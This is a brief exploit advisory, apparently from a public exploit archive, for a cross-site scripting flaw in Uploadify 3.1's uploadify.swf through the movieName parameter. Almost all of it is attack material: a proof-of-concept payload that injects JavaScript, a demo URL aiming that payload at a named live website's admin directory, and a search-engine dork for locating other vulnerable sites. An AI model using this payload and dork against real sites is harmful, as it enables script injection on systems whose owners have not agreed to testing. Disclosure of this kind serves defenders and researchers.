# Affected software:
# Type of vulnerability:
# URL: http://www.uploadify.com/
# Discovered by: Provensec
# Website: http://www.provensec.com

#version 3.1
# Proof of concept

uploadify.swf?movieName=%22])}catch(e){if(!window.x){window.x=1;confirm(%27XSS%27)}}//&.swf


demo

http://www.renders-dbz.com/admin/include/uploadify/uploadify.swf?movieName=%22])}catch(e){if(!window.x){window.x=1;confirm(%27XSS%27)}}//&.swf

dork:inurl:uploadify.swf ext:swf